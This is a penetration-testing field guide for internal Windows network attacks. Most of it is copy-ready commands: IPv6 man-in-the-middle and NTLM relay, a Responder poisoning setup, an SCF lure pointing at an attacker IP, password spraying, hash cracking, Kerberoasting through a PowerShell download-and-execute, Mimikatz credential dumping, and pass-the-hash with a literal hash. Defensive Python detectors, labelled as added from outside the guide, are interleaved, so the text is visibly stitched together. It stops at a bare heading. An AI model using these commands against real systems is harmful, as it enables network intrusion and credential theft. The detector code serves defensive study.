Internal Security Assessment: Field Guide
By Paul Seekamp
Table of Contents
RECONNAISSANCE ........ 2
  IPv4 Network Access Control (NAC) Bypass ........ 3
  Unauthenticated Asset Discovery ........ 3
  Authenticated Asset/Username Discovery ........ 5
  Port Discovery ........ 6
VULNERABILITY IDENTIFICATION ........ 7
  Vulnerability Scanners ........ 8
INITIAL FOOTHOLD ........ 9
  Default Credentials ........ 10
  Acquire Credentials ........ 15
CRACKING HASHES ........ 19
  Wordlists and Rules and Masks ........ 20
WINDOWS VERTICAL PRIVILEGE ESCALATION ........ 22
  Remote User to Admin ........ 23
WINDOWS HORIZONTAL PRIVILEGE ESCALATION ........ 25
  Logged In Users ........ 26
  Remote Mimikatz/LSA Dumps from Local Admin ........ 26
  Pass the Hash (PtH) ........ 27
  Pass the Key (PtK) ........ 28
  Pass the Ticket (PtT) ........ 30
  Silver Ticket ........ 31
  Golden Ticket ........ 33
  Automate Local Admin to Domain Admin (Noisy) ........ 35
CREDENTIAL PILLAGING ........ 36
  Extract SAM & Cached Hashes Manually ........ 37
  Extract NTDS.dit Hashes Manually ........ 37
  Extract NTDS.dit Hashes (Automated) ........ 37
  Find Plaintext Passwords ........ 38
  WPA PSK String Extraction ........ 40
WIRELESS ........ 42
  WPA/WPA2 Hash Capture with Users ........ 43
  WPA/WPA2 Hash Capture without Users (PMKID) ........ 43
  WPS ........ 44
  Enterprise Wireless ........ 44
  Evil Twin (Social Engineering) ........ 45
  Open Wireless ........ 45
  WEP Wireless ........ 45

Internal Security Assessment: Field Guide Page 1


RECONNAISSANCE

IPv4 Network Access Control (NAC) Bypass

Bypass IPv4 with IPv6


#Most defensive tools exclusively look at IPv4 addresses. Forcing traffic over IPv6 yields a high chance you will go undetected and be unchallenged.
#Use Metasploit to scan to determine if IPv6 is in use.

auxiliary/scanner/discovery/ipv6_multicast_ping

auxiliary/scanner/discovery/ipv6_neighbor

auxiliary/scanner/discovery/ipv6_neighbor_router_advertisement

mitm6
#Launch a man in the middle attack over IPv6.
https://github.com/fox-it/mitm6.git
https://github.com/SecureAuthCorp/impacket.git

mitm6 -hw icorp-w10 -d internal.corp --ignore-nofqdn

ntlmrelayx.py -t ldaps://icorp-dc.internal.corp -wh attacker-wpad --delegate-access

Unauthenticated Asset Discovery


#Various techniques to enumerate hosts and services
Private IPv4 Networks

10.0.0.0/8

172.16.0.0/12

192.168.0.0/16

ARP Scan

netdiscover -i eth0

NetBIOS Scan

nbtscan <CIDR>

Limited Port Scan

nmap -sS -p 445,22,80 <CIDR> --max-os-tries 1 --max-retries 3 --min-rtt-timeout 100ms --initial-rtt-timeout 500ms --defeat-rst-ratelimit --min-rate 450 --max-rate 15000 --open

Ping Sweep (host discovery only, no ports)

nmap -sP <CIDR>

Mass Scan

masscan <CIDR> --top-ports 100

DNS Enumeration

fierce -dns example.com OR nmap --script dns-brute example.com

Authenticated Asset/Username Discovery

Basic User Dump of AD Computers


https://github.com/dirkjanm/ldapdomaindump

ldapdomaindump -u DOMAIN\\notanadmin -p QWERTY <target>

Basic User DNS Dump


https://github.com/dirkjanm/adidnsdump

adidnsdump -u DOMAIN\\notanadmin <target>

Domain Admins Locator


https://github.com/nullbind/Powershellery/blob/master/Stable-ish/Get-SPN/Get-SPN.psm1

Get-SPN -type group -search "Domain Admins" -List yes -DomainController <target> -Credential domainuser | Format-Table -AutoSize

Dump Global Address List


https://github.com/dafthack/MailSniper

Get-GlobalAddressList -ExchHostname exchange.example.local -Username [email protected] -Password Password123

Dump Active Directory Usernames


https://github.com/dafthack/MailSniper

Get-ADUsernameFromEWS -Emaillist .\users.txt

Port Discovery

Rapid TCP Port Scan


#Scan for the most common ports of interest. Helpful for quick results on a large scope.

nmap -iL targets.txt --excludefile exclude.txt --privileged -n -PE -PS21-23,25,53,80,110-111,135,139,143,443,445,993,995,1723,3306,3389,5900,8080 --osscan-guess --max-os-tries 1 --max-retries 3 --min-rtt-timeout 100ms --initial-rtt-timeout 500ms --defeat-rst-ratelimit --min-rate 450 --max-rate 15000 --open --stats-every 10s -oX /tmp/nmap.xml

Default TCP Port Scan


#Scan for the most common/default ports. Slower results on a large scope.

nmap -iL targets.txt --excludefile exclude.txt --osscan-guess --max-os-tries 1 --max-retries 3 --min-rtt-timeout 100ms --initial-rtt-timeout 500ms --defeat-rst-ratelimit --min-rate 450 --max-rate 15000 --open --stats-every 10s -oX /tmp/nmap.xml

Rapid TCP/UDP Port Scan


#Scan for the most common ports of interest. Helpful for quick results on a large scope.

nmap -iL targets.txt --excludefile exclude.txt --privileged -n -PE -PS21-23,25,53,80,110-111,135,139,143,443,445,993,995,1723,3306,3389,5900,8080 -PU53,67-69,123,135,137-139,161-162,445,500,514,520,631,1434,1900,4500,5353,49152 --osscan-guess --max-os-tries 1 --max-retries 3 --min-rtt-timeout 100ms --initial-rtt-timeout 500ms --defeat-rst-ratelimit --min-rate 450 --max-rate 15000 --open --stats-every 10s -oX /tmp/nmap.xml

Extensive TCP Port Scan


#Scan for the most common ports of interest. Very slow on a large scope.

nmap -iL targets.txt -p- --excludefile exclude.txt --osscan-guess --max-os-tries 1 --max-retries 3 --min-rtt-timeout 100ms --initial-rtt-timeout 500ms --defeat-rst-ratelimit --min-rate 450 --max-rate 15000 --open --stats-every 10s -oX /tmp/nmap.xml

VULNERABILITY IDENTIFICATION

Vulnerability Scanners
Invest in a decent vulnerability scanner for internal assessments. This can help automate identification of low hanging fruit.

Paid Scanning Tools            Function
Tenable Nessus                 Infrastructure Vulnerability Scanner, Light Application Analysis
Rapid7 Nexpose                 Infrastructure Vulnerability Scanner, Light Application Analysis
Saint                          Infrastructure Vulnerability Scanner, Light Application Analysis
BurpSuite                      Heavy, Manual Web Application Analysis
Acunetix                       Automated Web Application Analysis
Netsparker                     Automated Web Application Analysis

Free Scanning Tools            Function
OpenVAS                        Infrastructure Vulnerability Scanner, Light Application Analysis
Wapiti                         Web Application Analysis only
NMAP Scripts                   Infrastructure Vulnerability Scanner, Light Application Analysis
Metasploit Auxiliary Modules   Infrastructure Vulnerability Scanner, Light Application Analysis

INITIAL FOOTHOLD

Default Credentials
#All of the tools below help to look for default credential usage. No one tool will find all the default credentials.

NMAP Default Creds

nmap --script http-default-accounts -p 80,81,280,591,593,832,981,1311,2480,4444,4445,4567,5000,5104,5800,7000,7001,7002,8008,8042,8088,8222,8243,8280,8281,8333,8530,8531,8887,8888,9080,9981,12443,12043,12046,16080,18091,18092,8080,443,8443,8081,9090,9091,8000,10443,22,21,23 -iL targets.txt -oX /tmp/default_creds.xml

Changeme Cred Scan


#HTTP scanner by default, has support for SSH, SSH keys, and SNMP.
https://github.com/ztgrace/changeme.git

changeme.py default_creds.xml

EyeWitness Active Cred Scan


#HTTP credential scanner.
https://github.com/FortyNorthSecurity/EyeWitness.git

Eyewitness -x default_creds.xml --active-scan --web

BruteSpray Cred Scan


#Imports an nmap XML file, and scans for the below supported services:
ssh, ftp, telnet, vnc, mssql, mysql, postgresql, rsh, imap, nntp, pcanywhere, pop3, rexec, rlogin, smbnt, smtp, svn, vmauthd, snmp
https://github.com/x90skysn3k/brutespray.git

python brutespray.py --file default_creds.xml --threads 5 --hosts 5

Brutex Cred Scan

#Automatically brute force all logins running on a target.
https://github.com/1N3/BruteX.git

brutex <target>

Metasploit Cred Scans


#Miscellaneous scanner modules for specific services and goals.

use auxiliary/scanner/printer/canon_iradv_pwd_extract

use auxiliary/scanner/telnet/lantronix_telnet_password

use auxiliary/scanner/db2/db2_auth

use auxiliary/scanner/ipmi/ipmi_dumphashes

auxiliary/admin/mssql/mssql_enum_sql_logins

auxiliary/admin/oracle/oracle_login

auxiliary/scanner/acpp/login

auxiliary/scanner/afp/afp_login

auxiliary/scanner/couchdb/couchdb_login

auxiliary/scanner/ftp/ftp_login

auxiliary/scanner/http/advantech_webaccess_login

auxiliary/scanner/http/appletv_login

auxiliary/scanner/http/axis_login

auxiliary/scanner/http/bavision_cam_login

auxiliary/scanner/http/binom3_login_config_pass_dump

auxiliary/scanner/http/buffalo_login

auxiliary/scanner/http/buildmaster_login

auxiliary/scanner/http/caidao_bruteforce_login

auxiliary/scanner/http/chef_webui_login

auxiliary/scanner/http/cisco_firepower_login

auxiliary/scanner/http/cnpilot_r_web_login_loot

auxiliary/scanner/http/directadmin_login

auxiliary/scanner/http/dlink_dir_300_615_http_login

auxiliary/scanner/http/dlink_dir_615h_http_login

auxiliary/scanner/http/dlink_dir_session_cgi_http_login

auxiliary/scanner/http/dolibarr_login

auxiliary/scanner/http/epmp1000_web_login

auxiliary/scanner/http/etherpad_duo_login

auxiliary/scanner/http/frontpage_login

auxiliary/scanner/http/gavazzi_em_login_loot

auxiliary/scanner/http/gitlab_login

auxiliary/scanner/http/glassfish_login

auxiliary/scanner/http/hp_sys_mgmt_login

auxiliary/scanner/http/http_login

auxiliary/scanner/http/ipboard_login

auxiliary/scanner/http/jenkins_login

auxiliary/scanner/http/joomla_bruteforce_login

auxiliary/scanner/http/manageengine_desktop_central_login

auxiliary/scanner/http/mybook_live_login

auxiliary/scanner/http/octopusdeploy_login

auxiliary/scanner/http/openmind_messageos_login

auxiliary/scanner/http/oracle_ilom_login

auxiliary/scanner/http/owa_ews_login

auxiliary/scanner/http/owa_login

auxiliary/scanner/http/phpmyadmin_login

auxiliary/scanner/http/pocketpad_login

auxiliary/scanner/http/splunk_web_login

auxiliary/scanner/http/symantec_web_gateway_login

auxiliary/scanner/http/tomcat_mgr_login

auxiliary/scanner/http/vcms_login

auxiliary/scanner/http/wordpress_login_enum

auxiliary/scanner/http/wordpress_xmlrpc_login

auxiliary/scanner/http/zabbix_login

auxiliary/scanner/lotus/lotus_domino_login

auxiliary/scanner/misc/cctv_dvr_login

auxiliary/scanner/misc/ibm_mq_login

auxiliary/scanner/mongodb/mongodb_login

auxiliary/scanner/msf/msf_rpc_login

auxiliary/scanner/msf/msf_web_login

auxiliary/scanner/mssql/mssql_login

auxiliary/scanner/mysql/mysql_login

auxiliary/scanner/nessus/nessus_ntp_login

auxiliary/scanner/nessus/nessus_rest_login

auxiliary/scanner/nessus/nessus_xmlrpc_login

auxiliary/scanner/nexpose/nexpose_api_login

auxiliary/scanner/nntp/nntp_login

auxiliary/scanner/openvas/openvas_gsad_login

auxiliary/scanner/openvas/openvas_omp_login

auxiliary/scanner/openvas/openvas_otp_login

auxiliary/scanner/oracle/isqlplus_login

auxiliary/scanner/oracle/oracle_login

auxiliary/scanner/pcanywhere/pcanywhere_login

auxiliary/scanner/pop3/pop3_login

auxiliary/scanner/postgres/postgres_login

auxiliary/scanner/redis/redis_login

auxiliary/scanner/rservices/rexec_login

auxiliary/scanner/rservices/rlogin_login

auxiliary/scanner/rservices/rsh_login

auxiliary/scanner/sap/sap_mgmt_con_brute_login

auxiliary/scanner/sap/sap_soap_rfc_brute_login

auxiliary/scanner/sap/sap_web_gui_brute_login

auxiliary/scanner/scada/koyo_login

auxiliary/scanner/smb/smb_login

auxiliary/scanner/snmp/snmp_login

auxiliary/scanner/ssh/karaf_login

auxiliary/scanner/ssh/ssh_login

auxiliary/scanner/ssh/ssh_login_pubkey

auxiliary/scanner/telnet/brocade_enable_login

auxiliary/scanner/telnet/telnet_login

auxiliary/scanner/teradata/teradata_odbc_login

auxiliary/scanner/varnish/varnish_cli_login

auxiliary/scanner/vmware/vmauthd_login

auxiliary/scanner/vmware/vmware_http_login

auxiliary/scanner/vnc/vnc_login

auxiliary/scanner/winrm/winrm_login

auxiliary/voip/asterisk_login

auxiliary/scanner/http/epmp1000_dump_hashes

auxiliary/scanner/http/manageengine_deviceexpert_user_creds

auxiliary/scanner/http/surgenews_user_creds

auxiliary/scanner/ipmi/ipmi_dumphashes

auxiliary/scanner/lotus/lotus_domino_hashes

auxiliary/scanner/mssql/mssql_hashdump

auxiliary/scanner/mysql/mysql_authbypass_hashdump

auxiliary/scanner/mysql/mysql_hashdump

auxiliary/scanner/oracle/oracle_hashdump

auxiliary/scanner/postgres/postgres_hashdump

auxiliary/scanner/sap/sap_soap_rfc_eps_get_directory_listing

auxiliary/scanner/sap/sap_soap_rfc_pfl_check_os_file_existence

auxiliary/scanner/sap/sap_soap_rfc_rzl_read_dir

auxiliary/scanner/snmp/brocade_enumhash

Acquire Credentials

Automate reverse bruteforce, SCF upload, LLMNR/NBTNS/mDNS poisoning, SMB relay, IPv6 DNS poison
https://github.com/DanMcInerney/icebreaker.git

icebreaker.py -l targets.txt

SCF Upload

#SMB Share File attack.

Create an SCF file with the following:

[Shell]
Command=2
IconFile=\\<attacker IP>\share\test.ico
[Taskbar]
Command=ToggleDesktop

Upload to the share.

responder -I eth0 -v
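The SCF lure above only works because its IconFile value is a UNC path that Explorer will authenticate to when the folder is rendered. As an added example (not from the guide), the Python below walks a mounted share and flags .scf files whose IconFile points at a host outside an allow-list; the sample share, file names and the 203.0.113.7 address are constructed.

```python
import os
import re
import tempfile
from typing import Dict, List, Set, Tuple

# \\host\share\... -> capture "host" (the machine a client would authenticate to)
UNC_RE = re.compile(r"^\\\\([^\\]+)\\")


def parse_scf(text: str) -> Dict[str, Dict[str, str]]:
    """Minimal INI-style parser for SCF files: {section: {key: value}}, keys case-folded."""
    sections: Dict[str, Dict[str, str]] = {}
    current = None
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith(";"):
            continue
        if line.startswith("[") and line.endswith("]"):
            current = line[1:-1].lower()
            sections.setdefault(current, {})
        elif "=" in line and current is not None:
            key, value = line.split("=", 1)
            sections[current][key.strip().lower()] = value.strip()
    return sections


def scf_findings(path: str, allowed_hosts: Set[str]) -> List[str]:
    """Reasons this SCF file looks like a credential-capture lure (empty list = clean)."""
    with open(path, "r", encoding="utf-8", errors="replace") as fh:
        cfg = parse_scf(fh.read())
    reasons = []
    icon = cfg.get("shell", {}).get("iconfile", "")
    match = UNC_RE.match(icon)
    if match:
        host = match.group(1).lower()
        if host not in {h.lower() for h in allowed_hosts}:
            reasons.append(f"IconFile points at non-allow-listed UNC host {host!r}")
    return reasons


def scan_share(root: str, allowed_hosts: Set[str]) -> List[Tuple[str, List[str]]]:
    """Walk a mounted share and return (path, reasons) for every suspicious .scf file."""
    hits = []
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            if name.lower().endswith(".scf"):
                full = os.path.join(dirpath, name)
                reasons = scf_findings(full, allowed_hosts)
                if reasons:
                    hits.append((full, reasons))
    return hits


def demo() -> List[Tuple[str, List[str]]]:
    """Constructed sample share: one lure (same template as the guide) and one benign SCF."""
    root = tempfile.mkdtemp(prefix="share_")
    with open(os.path.join(root, "@readme.scf"), "w") as fh:
        fh.write("[Shell]\nCommand=2\nIconFile=\\\\203.0.113.7\\share\\test.ico\n"
                 "[Taskbar]\nCommand=ToggleDesktop\n")
    with open(os.path.join(root, "Show Desktop.scf"), "w") as fh:
        fh.write("[Shell]\nCommand=2\nIconFile=explorer.exe,3\n"
                 "[Taskbar]\nCommand=ToggleDesktop\n")
    return scan_share(root, allowed_hosts={"fileserver01"})


if __name__ == "__main__":
    for path, reasons in demo():
        print(path, "->", "; ".join(reasons))
```

Run it against the root of each writable share; a hit on a share where ordinary users can write is the same condition the upload step above needs.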

LLMNR/NBTNS/mDNS poisoning – Capture Hashes

responder -I eth0 -rPv

Find Hosts with SMB Signing Disabled

crackmapexec smb <CIDR> --gen-relay-list smbrelay.txt

LLMNR/NBTNS/mDNS poisoning – Relay Hashes


#Configure Responder to redirect user auth. In responder.conf, set SMB, HTTP and HTTPS to OFF in the list of servers to start, then:

responder -I eth0 -v

ntlmrelayx.py -tf smbrelay.txt

Devices with LDAP enabled


Finding printers
https://github.com/rvrsh3ll/SharpPrinter
https://github.com/percx/Praeda.git
Manual Exploit

Search for default credentials on printers with LDAP enabled

netcat -l -vv -p 444

Initiate an LDAP query.

Seth MiTM RDP Connections


https://github.com/SySS-Research/Seth

seth.sh <INTERFACE> <ATTACKER IP> <VICTIM IP> <GATEWAY IP|HOST IP>

Resource-based Constrained Delegation


Impacket

mitm6 -i eth0 -d <domain>

ntlmrelayx.py -t ldaps://<DomainController> -wh attacker-wpad --delegate-access

export KRB5CCNAME=<TGS_ccache_file>

secretsdump.py -k -no-pass <VictimPC>

Password Spray
Collect usernames from the internet.
- theHarvester - https://github.com/laramies/theHarvester.git
- LinkedInt - https://github.com/mdsecactivebreach/LinkedInt
- Raven - https://github.com/0x09AL/raven
- Hunter.io
- Weleakinfo.com - $2 purchase required
- Scylla - https://scylla.sh/
- ridenum.py 172.20.132.25 500 50000 | tee -a ridenum.log
https://github.com/Greenwolf/Spray.git

spray.sh -smb <targetIP> <usernameList> <passwordList> <AttemptsPerLockoutPeriod> <LockoutPeriodInMinutes> <DOMAIN>

Crackmapexec

crackmapexec <protocol> <target(s)> -u username1 -p password1 password2

crackmapexec <protocol> <target(s)> -u username1 username2 -p password1

crackmapexec <protocol> <target(s)> -u ~/file_containing_usernames -p ~/file_containing_passwords

crackmapexec <protocol> <target(s)> -u ~/file_containing_usernames -H ~/file_containing_ntlm_hashes
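A spray stays under <AttemptsPerLockoutPeriod> per account, so the per-account counter that lockout relies on never trips. As an added example (not from the guide), this Python flags the signature a defender can still see: one source failing against many distinct accounts within a window, with only a failure or two on each. The CSV log lines are constructed to stand in for an Event ID 4625/4624 export.

```python
from collections import defaultdict
from datetime import datetime, timedelta
from typing import Dict, List

# Constructed export of logon events: "timestamp,source_ip,username,result"
SAMPLE_LOG = """\
2024-03-01T09:00:01,10.10.5.20,alice,FAIL
2024-03-01T09:00:02,10.10.5.20,bob,FAIL
2024-03-01T09:00:03,10.10.5.20,carol,FAIL
2024-03-01T09:00:04,10.10.5.20,dave,FAIL
2024-03-01T09:00:05,10.10.5.20,erin,FAIL
2024-03-01T09:00:06,10.10.5.20,frank,FAIL
2024-03-01T09:00:07,10.10.5.20,grace,SUCCESS
2024-03-01T09:01:00,10.10.7.44,alice,FAIL
2024-03-01T09:05:00,10.10.7.44,alice,FAIL
2024-03-01T09:09:00,10.10.7.44,alice,SUCCESS
"""


def parse_events(text: str) -> List[dict]:
    """Turn the CSV export into dicts with a real datetime for windowing."""
    events = []
    for line in text.splitlines():
        if not line.strip():
            continue
        ts, src, user, result = line.split(",")
        events.append({"ts": datetime.fromisoformat(ts), "src": src,
                       "user": user.lower(), "result": result.upper()})
    return events


def detect_spray(events: List[dict], window: timedelta = timedelta(minutes=30),
                 min_accounts: int = 5, max_per_account: int = 2) -> Dict[str, dict]:
    """Return {source_ip: {"accounts": [...], "successes": [...]}} for every source that,
    inside one `window`, failed against at least `min_accounts` distinct accounts while
    never exceeding `max_per_account` failures on any one of them (the below-lockout
    pattern). Successes inside the same window are the accounts to reset first."""
    by_src: Dict[str, List[dict]] = defaultdict(list)
    for ev in sorted(events, key=lambda e: e["ts"]):
        by_src[ev["src"]].append(ev)

    flagged: Dict[str, dict] = {}
    for src, evs in by_src.items():
        for i, start in enumerate(evs):          # slide the window over this source's events
            fails: Dict[str, int] = defaultdict(int)
            successes = set()
            for ev in evs[i:]:
                if ev["ts"] - start["ts"] >= window:
                    break
                if ev["result"] == "FAIL":
                    fails[ev["user"]] += 1
                else:
                    successes.add(ev["user"])
            if len(fails) >= min_accounts and max(fails.values()) <= max_per_account:
                flagged[src] = {"accounts": sorted(fails), "successes": sorted(successes)}
                break                             # one alert per source is enough
    return flagged


if __name__ == "__main__":
    for src, info in detect_spray(parse_events(SAMPLE_LOG)).items():
        print(f"{src}: sprayed {len(info['accounts'])} accounts, hits on {info['successes']}")
```

The user mistyping one password repeatedly (10.10.7.44 in the sample) hits a single account and is not flagged; min_accounts is the knob to tune against the domain's own lockout threshold.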

CRACKING HASHES

Wordlists and Rules and Masks

Wordlists
- https://mega.nz/#!aqRS2CJZ!TjbvyNcrXxMXNNRiUOIsz91NrzVuqm_r-Z_CZ_udD5Q
- https://crackstation.net/crackstation-wordlist-password-cracking-dictionary.htm
- https://github.com/danielmiessler/SecLists/tree/master/Passwords
- https://hashes.org/leaks.php

Create Company Specific Wordlist


#Businesses often share a common password related to the business.
https://github.com/digininja/CeWL

cewl -d 3 -m 4 -w /tmp/cewl-wordlist.txt http://domain.com
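The observation behind the CeWL step cuts both ways: if a company-derived wordlist cracks passwords, a banned-word check built from the same terms stops them being set in the first place. Added example (not from the guide): a small filter that undoes the leet substitutions a rule file would try and rejects passwords built around company terms; the term list and test passwords are constructed.

```python
import re
from typing import List

# Constructed company terms, the kind of list cewl would pull from a corporate website
COMPANY_TERMS = ["acme", "widgets", "rocket", "springfield"]

# Common substitutions a cracking rule would try; undone here so "R0ck3t" reads as "rocket"
LEET = str.maketrans({"0": "o", "1": "i", "3": "e", "4": "a", "5": "s",
                      "7": "t", "@": "a", "$": "s", "!": "i"})


def normalize(password: str) -> str:
    """Case-fold and undo leet substitutions before comparing against the term list."""
    return password.lower().translate(LEET)


def banned_term_hits(password: str, terms: List[str], min_len: int = 4) -> List[str]:
    """Company terms of at least min_len chars that appear inside the normalized password."""
    norm = normalize(password)
    return [t for t in terms if len(t) >= min_len and t.lower() in norm]


def check_password(password: str, terms: List[str] = COMPANY_TERMS,
                   min_len: int = 12) -> List[str]:
    """Return policy failures; an empty list means the password is acceptable."""
    problems = []
    if len(password) < min_len:
        problems.append(f"shorter than {min_len} characters")
    hits = banned_term_hits(password, terms)
    if hits:
        problems.append("contains company term(s): " + ", ".join(hits))
        # term + year + symbol is exactly what wordlist + rules recovers first
        if re.search(r"(19|20)\d\d", password):
            problems.append("company term combined with a year")
    return problems


if __name__ == "__main__":
    for pw in ["Acme2024!", "R0ck3tW1dg3ts!!", "correct-horse-battery-staple"]:
        print(pw, "->", check_password(pw) or "ok")
```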

Common Hashes to Crack (Hashcat)


900 | MD4
0 | MD5
3000 | LM
1000 | NTLM
1100 | Domain Cached Credentials (DCC), MS Cache
2100 | Domain Cached Credentials 2 (DCC2), MS Cache 2
5500 | NetNTLMv1
5600 | NetNTLMv2
2500 | WPA/WPA2
13100 | Kerberos 5 TGS-REP etype 23 (Kerberoast)

Convert MScach2 from Metasploit to Hashcat Format

cd ~/.msf4/loot && cat *mscache* | cut -d '"' -f 2,4 | sed s/\"/\:/g | tr -cd '\11\12\40-\176' | grep -v Username | cut -d : -f 1,2 | awk -F':' '{print $2,$1}' | sed 's/ /:/g' > mscache.hash

Wordlist/No rules

hashcat -m 5600 -O -w 3 admin_hash.txt fav_wordlist.txt

Wordlist W/rules

hashcat -m 5600 -O -w 3 admin_hash.txt fav_wordlist.txt -r /usr/share/hashcat/rules/d3ad0ne.rule

Bruteforce No Special Char

hashcat -m 5600 -O -w 3 admin_hash.txt -a 3

Crack IPMI

hashcat --username -m 7300 -O -w 3 admin_hash.txt fav_wordlist.txt -r /usr/share/hashcat/rules/d3ad0ne.rule

Combination Attack

hashcat -m 0 -a 1 hash.txt dict1.txt dict2.txt

WINDOWS VERTICAL PRIVILEGE ESCALATION

Remote User to Admin

Kerberoast
https://github.com/SecureAuthCorp/impacket.git (Linux)

GetUserSPNs.py -request domain.info/notanadmin

https://github.com/GhostPack/Rubeus.git (Windows)

.\Rubeus.exe kerberoast /outfile:

PowerShell

iex (new-object Net.WebClient).DownloadString("https://raw.githubusercontent.com/EmpireProject/Empire/master/data/module_source/credentials/Invoke-Kerberoast.ps1")

Invoke-Kerberoast -OutputFormat <TGSs_format [hashcat | john]> | % { $_.Hash } | Out-File -Encoding ASCII <output_TGSs_file>
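All three tools above request RC4 (etype 0x17) service tickets for every user account that carries an SPN, and each request lands as Event ID 4769 on the domain controller. Added example (not from the guide): a Python pass over a constructed 4769 export that flags a requester collecting several such tickets and lists the service accounts still issued RC4 tickets, which is the remediation list (AES-only keys, gMSA, or long random passwords).

```python
from collections import defaultdict
from typing import Dict, Set

# Constructed 4769 export: "time,requesting_account,service_name,ticket_encryption_type"
SAMPLE_4769 = """\
2024-03-01T10:00:00,notanadmin@DOMAIN.INFO,svc_sql,0x17
2024-03-01T10:00:00,notanadmin@DOMAIN.INFO,svc_web,0x17
2024-03-01T10:00:01,notanadmin@DOMAIN.INFO,svc_backup,0x17
2024-03-01T10:00:01,notanadmin@DOMAIN.INFO,svc_sccm,0x17
2024-03-01T10:00:01,notanadmin@DOMAIN.INFO,svc_print,0x17
2024-03-01T10:00:02,notanadmin@DOMAIN.INFO,WS01$,0x12
2024-03-01T10:03:10,alice@DOMAIN.INFO,svc_web,0x12
2024-03-01T10:04:20,bob@DOMAIN.INFO,svc_sql,0x17
2024-03-01T10:05:00,bob@DOMAIN.INFO,krbtgt,0x12
"""


def is_roastable(service: str, etype: str) -> bool:
    """RC4-HMAC (0x17) ticket for a user-type service account: not a machine account
    (trailing $) and not krbtgt, whose keys are long and random and not worth cracking."""
    return (etype.lower() == "0x17"
            and not service.endswith("$")
            and service.lower() != "krbtgt")


def analyze_4769(text: str, threshold: int = 3) -> Dict[str, object]:
    """Group roastable ticket requests by requester. Requesters at or above `threshold`
    distinct service accounts are suspects; the union of services is the fix list."""
    per_requester: Dict[str, Set[str]] = defaultdict(set)
    rc4_services: Set[str] = set()
    for line in text.splitlines():
        if not line.strip():
            continue
        _ts, requester, service, etype = line.split(",")
        if is_roastable(service, etype):
            per_requester[requester].add(service)
            rc4_services.add(service)
    suspects = {r: sorted(s) for r, s in per_requester.items() if len(s) >= threshold}
    return {"suspects": suspects, "rc4_service_accounts": sorted(rc4_services)}


if __name__ == "__main__":
    report = analyze_4769(SAMPLE_4769)
    for requester, services in report["suspects"].items():
        print(f"{requester} requested RC4 tickets for {len(services)} service accounts")
    print("still RC4-capable:", report["rc4_service_accounts"])
```

A legitimate client talking to a service account that has no AES keys also produces 0x17, so the per-requester count, not a single event, is the alert; the service list is worth fixing either way.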

Extract GPP Credentials


https://github.com/byt3bl33d3r/CrackMapExec

crackmapexec smb DC_IP_ADDR -u notanadmin -p Password123 -d domain -M gpp_password

MS Exchange – Domain Escalation


https://github.com/dirkjanm/PrivExchange

ntlmrelayx.py -t ldap://dc.example.local --escalate-user notanadmin

python privexchange.py -ah attacker.example.local exchange.example.local -u notanadmin -d example.local

secretsdump.py example.local/[email protected] -just-dc

Active Directory Low Hanging Fruit Check

pingcastle.exe --healthcheck --server <DOMAIN_CONTROLLER_IP> --user <USERNAME> --password <PASSWORD>

WINDOWS HORIZONTAL PRIVILEGE ESCALATION

Logged In Users

Crackmapexec

crackmapexec smb 192.168.1.0/24 -u username -p Password123 -d domain --loggedon-users

Metasploit

use auxiliary/scanner/smb/psexec_loggedin_users

Set: RHOSTS, SMBUser, SMBPass, SMBDomain, run

Pingcastle

pingcastle.exe --graph --server <DOMAIN_CONTROLLER_IP> --user <USERNAME> --password <PASSWORD>

Bloodhound
https://github.com/BloodHoundAD/BloodHound

neo4j start

python bloodhound.py -u <USERNAME> -p <PASSWORD> -d <DOMAIN_NAME> -dc <DOMAIN_CONTROLLER_HOSTNAME>

Bloodhound – LSASSY
https://github.com/Hackndo/lsassy/tree/master/cme
#Must patch CrackMapExec first

crackmapexec smb 10.0.0.0/24 -d adsec.local -u Administrator -p Passw0rd -M lsassy -o BLOODHOUND=True NEO4JPASS=bloodhound

Remote Mimikatz/LSA Dumps from Local Admin

Dump LSA secrets


Crackmapexec

https://github.com/byt3bl33d3r/CrackMapExec

crackmapexec smb targets.txt -u localadmin -p Password123 -d domain --lsa

Metasploit

use auxiliary/scanner/smb/impacket/secretsdump

Set: RHOSTS, SMBUser, SMBPass, SMBDomain, run

Lsassy
https://github.com/Hackndo/lsassy

lsassy -d adsec.local/pixis:[email protected]

Dump with Mimikatz


Crackmapexec

crackmapexec smb <target> -u admin -p Password123 -M mimikatz

Metasploit

exploit/windows/smb/psexec_psh

load kiwi

creds_all

Set: RHOSTS, SMBUser, SMBPass, SMBDomain, run

CredCrack
https://github.com/gojhonny/CredCrack

credcrack.py -f targets.txt -d domain -u localadmin -l <target>

Pass the Hash (PtH)

Dump SAM file (1)
Crackmapexec

crackmapexec smb targets.txt -u localadmin -p Password123 -d domain --sam

Metasploit

use exploit/windows/smb/psexec > load kiwi > creds_all

Set: RHOST, SMBUser, SMBPass, SMBdomain, run

Pass the Hash (2)


Crackmapexec

crackmapexec smb targets.txt -u localadmin -H 8846F7EAEE8FB117AD06BDD830B7586C -d LOCALHOST

Metasploit

use exploit/windows/smb/psexec

Set: RHOST, SMBUser, SMBPass LM:NTLM, run

Pass the Key (PtK)

Request The TGT via Linux (1)


Impacket
https://github.com/SecureAuthCorp/impacket.git
#Request the TGT with hash

python getTGT.py <domain_name>/<user_name> -hashes [lm_hash]:<ntlm_hash>

OR

#Request the TGT with aesKey

python getTGT.py <domain_name>/<user_name> -aesKey <aes_key>

OR

#Request the TGT with password

python getTGT.py <domain_name>/<user_name>:[password]

Pop Shell via Linux (2)


#Set the TGT from Impacket

export KRB5CCNAME=<TGS_ccache_file>

#Execute remote commands with psexec or smbexec or wmiexec

python psexec.py <domain_name>/<user_name>@<remote_hostname> -k -no-pass

OR

python smbexec.py <domain_name>/<user_name>@<remote_hostname> -k -no-pass

OR

python wmiexec.py <domain_name>/<user_name>@<remote_hostname> -k -no-pass

Request The TGT via Windows (1)


https://github.com/GhostPack/Rubeus.git
#Request the TGT with hash

.\Rubeus.exe asktgt /domain:<domain_name> /user:<user_name> /rc4:<ntlm_hash> /ptt

Pop Shell via Windows (2)


#Execute a cmd on the remote machine

.\PsExec.exe -accepteula \\<remote_hostname> cmd

Pass the Ticket (PtT)
Harvest tickets on Linux host (1)

grep default_ccache_name /etc/krb5.conf

OR

grep default_ccache_name /tmp/krb5cc_%{uid}

OR

#If the user is root, tickey will inject into other users' processes. Must be in a reachable folder.

https://github.com/TarlogicSecurity/tickey.git

cp tickey /tmp/tickey && /tmp/tickey -i

Use Ticket via Linux (2)


